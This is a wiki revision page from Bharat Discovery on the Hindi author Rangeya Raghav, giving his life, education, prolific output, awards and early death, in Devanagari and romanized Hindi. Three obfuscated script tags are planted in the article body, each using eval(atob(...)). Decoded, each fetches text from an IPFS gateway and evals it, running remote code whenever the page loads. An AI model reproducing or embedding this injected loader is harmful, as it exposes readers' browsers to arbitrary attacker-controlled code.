Difference between revisions of "रांगेय राघव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "गुरू" to "गुरु")
Line 36: Line 36:
 
रांगेय राघव का जन्म 17 जनवरी, 1923 ई. में [[आगरा]] में हुआ था। पिता श्री रंगाचार्य के पूर्वज लगभग तीन सौ वर्ष पहले [[जयपुर]] और फिर [[भरतपुर]] के बयाना कस्बे में आकर रहने लगे थे। रांगेय राघव का जन्म हिन्दी प्रदेश में हुआ। उन्हें [[तमिल भाषा|तमिल]] और [[कन्नड़ भाषा]] का भी ज्ञान था।  
 
रांगेय राघव का जन्म 17 जनवरी, 1923 ई. में [[आगरा]] में हुआ था। पिता श्री रंगाचार्य के पूर्वज लगभग तीन सौ वर्ष पहले [[जयपुर]] और फिर [[भरतपुर]] के बयाना कस्बे में आकर रहने लगे थे। रांगेय राघव का जन्म हिन्दी प्रदेश में हुआ। उन्हें [[तमिल भाषा|तमिल]] और [[कन्नड़ भाषा]] का भी ज्ञान था।  
 
==शिक्षा==  
 
==शिक्षा==  
रांगेय की शिक्षा आगरा में हुई थी। सेंट जॉन्स कॉलेज से 1944 में स्नातकोत्तर और 1949 में आगरा विश्वविद्यालय से गुरू गोरखनाथ पर शोध करके उन्होंने पी.एच.डी. की थी। रांगेय राघव का हिन्दी, [[अंग्रेज़ी]], [[ब्रजभाषा|ब्रज]] और [[संस्कृत]] पर असाधारण अधिकार था।
+
रांगेय की शिक्षा आगरा में हुई थी। सेंट जॉन्स कॉलेज से 1944 में स्नातकोत्तर और 1949 में आगरा विश्वविद्यालय से गुरु गोरखनाथ पर शोध करके उन्होंने पी.एच.डी. की थी। रांगेय राघव का हिन्दी, [[अंग्रेज़ी]], [[ब्रजभाषा|ब्रज]] और [[संस्कृत]] पर असाधारण अधिकार था।
 
==रचनाएँ==  
 
==रचनाएँ==  
 
रांगेय राघव हिन्दी के प्रगतिशील विचारों के लेखक थे, किन्तु मार्क्स के [[दर्शन]] को उन्होंने संशोधित रूप में ही स्वीकार किया। उन्होंने अल्प समय में ही कितने साहित्य का सृजन किया, इसका अनुमान इस विवरण से लगाया जा सकता है। उनके प्रकाशित ग्रन्थों में 42 उपन्यास, 11 कहानी, 12 आलोचनात्मक ग्रन्थ, 8 काव्य, 4 इतिहास, 6 समाजशास्त्र विषयक, 5 नाटक और लगभग 50 अनूदित पुस्तकें हैं। ये सब रचनाएँ उनके जीवन काल में प्रकाशित हो चुकी थीं। 39 वर्ष की कच्ची उम्र में इनका देहान्त हुआ, लगभग 20 पुस्तकें प्रकाशन की प्रतीक्षा में थीं। यद्यपि उन्होंने कुछ अंग्रेज़ी ग्रन्थों के भी अनुवाद किए, किन्तु उनके अधिकांश साहित्य का परिवेश भारतीय संस्कृति और ऐतिहासिक जीवन ही रहा है।  
 
रांगेय राघव हिन्दी के प्रगतिशील विचारों के लेखक थे, किन्तु मार्क्स के [[दर्शन]] को उन्होंने संशोधित रूप में ही स्वीकार किया। उन्होंने अल्प समय में ही कितने साहित्य का सृजन किया, इसका अनुमान इस विवरण से लगाया जा सकता है। उनके प्रकाशित ग्रन्थों में 42 उपन्यास, 11 कहानी, 12 आलोचनात्मक ग्रन्थ, 8 काव्य, 4 इतिहास, 6 समाजशास्त्र विषयक, 5 नाटक और लगभग 50 अनूदित पुस्तकें हैं। ये सब रचनाएँ उनके जीवन काल में प्रकाशित हो चुकी थीं। 39 वर्ष की कच्ची उम्र में इनका देहान्त हुआ, लगभग 20 पुस्तकें प्रकाशन की प्रतीक्षा में थीं। यद्यपि उन्होंने कुछ अंग्रेज़ी ग्रन्थों के भी अनुवाद किए, किन्तु उनके अधिकांश साहित्य का परिवेश भारतीय संस्कृति और ऐतिहासिक जीवन ही रहा है।  

Revision as of 13:40, 21 January 2012

raangey raghav
poora nam raangey raghav
janm 17 janavari, 1923
janm bhoomi agara, uttar pradesh
mrityu 12 sitanbar, 1962
mrityu sthan muanbee, maharashtr
palak mata-pita pita- shri rangachary
bhasha hindi, aangrezi, braj aur sanskrit
vidyalay seant j aauns k aaulej, agara vishvavidyalay
shiksha snatakottar, pi.ech.di
puraskar-upadhi hiandustani akadami puraskar, dalamiya puraskar, uttar pradesh shasan puraskar, rajasthan sahity akadami puraskar
nagarikata bharatiy
any janakari inaka mool nam ti.en.bi.achary (tiroomallai nanbakamh viraraghav achary) tha.
inhean bhi dekhean kavi soochi, sahityakar soochi

raangey raghav (janm: 17 janavari, 1923; mrityu: 12 sitanbar, 1962) asadharan pratibha ke dhani rachanakar the. hindi ke vishisht aur bahumukhi pratibhavaloan mean se ek the. inaka mool nam ti.en.bi.achary (tiroomallai nanbakamh viraraghav achary) tha. ve ramanujachary parampara ke tamil deshiy ayangar brahman the.

janm

raangey raghav ka janm 17 janavari, 1923 ee. mean agara mean hua tha. pita shri rangachary ke poorvaj lagabhag tin sau varsh pahale jayapur aur phir bharatapur ke bayana kasbe mean akar rahane lage the. raangey raghav ka janm hindi pradesh mean hua. unhean tamil aur kann d bhasha ka bhi jnan tha.

shiksha

raangey ki shiksha agara mean huee thi. seant j aauns k aaulej se 1944 mean snatakottar aur 1949 mean agara vishvavidyalay se guru gorakhanath par shodh karake unhoanne pi.ech.di. ki thi. raangey raghav ka hindi, aangrezi, braj aur sanskrit par asadharan adhikar tha.

rachanaean

raangey raghav hindi ke pragatishil vicharoan ke lekhak the, kintu marks ke darshan ko unhoanne sanshodhit roop mean hi svikar kiya. unhoanne alp samay mean hi kitane sahity ka srijan kiya, isaka anuman is vivaran se lagaya ja sakata hai. unake prakashit granthoan mean 42 upanyas, 11 kahani, 12 alochanatmak granth, 8 kavy, 4 itihas, 6 samajashastr vishayak, 5 natak aur lagabhag 50 anoodit pustakean haian. ye sab rachanaean unake jivan kal mean prakashit ho chuki thian. 39 varsh ki kachchi umr mean inaka dehant hua, lagabhag 20 pustakean prakashan ki pratiksha mean thian. yadyapi unhoanne kuchh aangrezi granthoan ke bhi anuvad kie, kintu unake adhikaansh sahity ka parivesh bharatiy sanskriti aur aitihasik jivan hi raha hai.

puraskar

raangey raghav ko hiandustani akadami puraskar (1947), dalamiya puraskar (1954), uttar pradesh shasan puraskar (1957 tatha 1959), rajasthan sahity akadami puraskar (1961) aur inake nidhan ke bad mahatma gaandhi puraskar (1966) se sammanit kiya. anek rachanaoan ka hianditar bharatiy aur videshi bhashaoan mean bhi anuvad kiya.

nidhan

raangey raghav ka nidhan matr 39 varsh ki umr mean muanbee mean san 1962 mean ho gaya tha. is adbhut rachanakar ko mrityu ne itani jaldi n utha liya hota to ve aur bhi naye mapadand sthapit karate.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>